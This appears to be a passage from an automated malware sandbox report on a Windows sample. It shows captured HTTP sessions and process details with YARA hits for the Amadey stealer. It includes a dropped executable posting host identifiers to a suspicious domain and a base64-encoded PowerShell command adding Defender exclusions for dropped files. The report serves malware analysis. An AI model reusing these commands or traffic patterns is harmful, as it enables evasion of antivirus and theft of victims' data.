                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              146192.168.2.46387113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC192OUTGET /rules/rule702650v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:22 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1358
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDEA1B544"
                                                                                                                                                                                                                                              x-ms-request-id: 5d06ec5e-b01e-0084-7009-2cd736000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061622Z-16ccfc49897rxrtbhC1DFWk40s00000001ug000000005e8g
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69 61 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702650" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedia" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              147192.168.2.46387013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC192OUTGET /rules/rule702651v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:22 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1395
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDEC600CC"
                                                                                                                                                                                                                                              x-ms-request-id: 1eed0337-a01e-0021-1809-2c814c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061622Z-16ccfc498978mvxwhC1DFWafzn00000001u0000000007hcg
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              148192.168.2.46387213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC192OUTGET /rules/rule703101v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:22 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1393
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE0F93037"
                                                                                                                                                                                                                                              x-ms-request-id: 2e3838b5-f01e-0071-7bc3-2b431c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061622Z-16ccfc498972mdvzhC1DFWzrms00000001hg00000000k1hq
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              149192.168.2.463873188.114.96.34431236C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 18168
                                                                                                                                                                                                                                              Host: necklacedmny.store
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 32 41 34 32 34 34 43 36 44 34 32 43 37 41 43 39 41 46 39 37 42 36 46 46 43 44 30 46 36 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B2A4244C6D42C7AC9AF97B6FFCD0F6FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC2837OUTData Raw: bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33
                                                                                                                                                                                                                                              Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3
                                                                                                                                                                                                                                              2024-11-02 06:16:23 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:23 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=tqmljbovl8tpca5pgfhqes04t1; expires=Wed, 26-Feb-2025 00:03:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzp8dU9uxeKrYZsDrIl8oD9HGD%2F265jorlUqpXmIIuHRgxH%2BtMLHo2%2FxRDa1L5OcF0UZEdDOxv3otgIfM%2FnJwBF0pXUFYwhIqoM%2FthcW1i09I%2Fv8Bx0b5apXwWP4q5eyruTJHrc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8dc1fed62b2a0b86-DFW
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1749&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19132&delivery_rate=1749848&cwnd=222&unsent_bytes=0&cid=f650a015adfdcd4f&ts=681&x=0"
                                                                                                                                                                                                                                              2024-11-02 06:16:23 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 11ok 173.254.250.68
                                                                                                                                                                                                                                              2024-11-02 06:16:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:02:14:53
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                              Imagebase:0x7a0000
                                                                                                                                                                                                                                              File size:1'894'400 bytes
                                                                                                                                                                                                                                              MD5 hash:1E33E63C356AC4032505C4A3F7157786
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1704119383.00000000007A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1663903218.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                              Start time:02:14:55
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                              Imagebase:0x4b0000
                                                                                                                                                                                                                                              File size:1'894'400 bytes
                                                                                                                                                                                                                                              MD5 hash:1E33E63C356AC4032505C4A3F7157786
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1734062990.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1693609127.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                              Start time:02:14:56
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              Imagebase:0x4b0000
                                                                                                                                                                                                                                              File size:1'894'400 bytes
                                                                                                                                                                                                                                              MD5 hash:1E33E63C356AC4032505C4A3F7157786
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1695582240.0000000005080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1736142318.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:02:16:00
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              Imagebase:0x4b0000
                                                                                                                                                                                                                                              File size:1'894'400 bytes
                                                                                                                                                                                                                                              MD5 hash:1E33E63C356AC4032505C4A3F7157786
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2335093980.0000000005150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:02:16:09
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe"
                                                                                                                                                                                                                                              Imagebase:0x970000
                                                                                                                                                                                                                                              File size:223'704 bytes
                                                                                                                                                                                                                                              MD5 hash:54F4EBCE5C56BF86C5948D89BA8C875F
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2705352741.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2640122155.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2671334911.0000000004473000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 18%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:02:16:12
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA=
                                                                                                                                                                                                                                              Imagebase:0x360000
                                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                              Start time:02:16:12
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                              Start time:02:16:14
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                              Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:02:16:16
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe
